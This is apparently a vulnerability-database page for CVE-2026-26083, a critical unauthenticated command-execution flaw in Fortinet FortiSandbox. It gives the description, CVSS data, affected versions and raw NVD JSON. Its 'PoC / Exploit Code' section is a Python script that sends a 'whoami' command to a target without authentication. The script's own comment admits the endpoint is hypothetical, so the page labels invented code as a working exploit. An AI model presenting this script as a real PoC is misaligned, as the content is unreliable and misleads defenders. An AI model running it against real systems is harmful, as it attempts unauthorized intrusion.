Security Vulnerability Report
中文
CVE-2026-26083 CVSS 9.8 CRITICAL

CVE-2026-26083

Published: 2026-05-12 18:16:40
Last Modified: 2026-05-12 18:57:02
Source: [email protected]

Description

A missing authorization vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.2 through 5.0.5, FortiSandbox PaaS 23.4 all versions, FortiSandbox PaaS 23.3 all versions, FortiSandbox PaaS 23.1 all versions, FortiSandbox PaaS 22.2 all versions, FortiSandbox PaaS 22.1 all versions, FortiSandbox PaaS 21.4 all versions, FortiSandbox PaaS 21.3 all versions, FortiSandbox PaaS 5.0.0 through 5.0.1, FortiSandbox PaaS 4.4.5 through 4.4.8 may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiSandbox 5.0.0 - 5.0.1
FortiSandbox 4.4.0 - 4.4.8
FortiSandbox Cloud 5.0.2 - 5.0.5
FortiSandbox PaaS 23.4 (全版本)
FortiSandbox PaaS 23.3 (全版本)
FortiSandbox PaaS 23.1 (全版本)
FortiSandbox PaaS 22.2 (全版本)
FortiSandbox PaaS 22.1 (全版本)
FortiSandbox PaaS 21.4 (全版本)
FortiSandbox PaaS 21.3 (全版本)
FortiSandbox PaaS 5.0.0 - 5.0.1
FortiSandbox PaaS 4.4.5 - 4.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # Target configuration target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1" url = f"{target}/api/vulnerable_endpoint" # Hypothetical endpoint based on description # Malicious payload to execute a command (e.g., 'whoami') payload = { "cmd": "whoami", "arg": "-u" } headers = { "User-Agent": "CVE-2026-26083-Exploit", "Content-Type": "application/json" } try: # Send unauthenticated HTTP request print(f"[*] Sending exploit request to {target}...") response = requests.post(url, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Command output:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26083", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:39.817", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authorization vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.2 through 5.0.5, FortiSandbox PaaS 23.4 all versions, FortiSandbox PaaS 23.3 all versions, FortiSandbox PaaS 23.1 all versions, FortiSandbox PaaS 22.2 all versions, FortiSandbox PaaS 22.1 all versions, FortiSandbox PaaS 21.4 all versions, FortiSandbox PaaS 21.3 all versions, FortiSandbox PaaS 5.0.0 through 5.0.1, FortiSandbox PaaS 4.4.5 through 4.4.8 may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-136", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.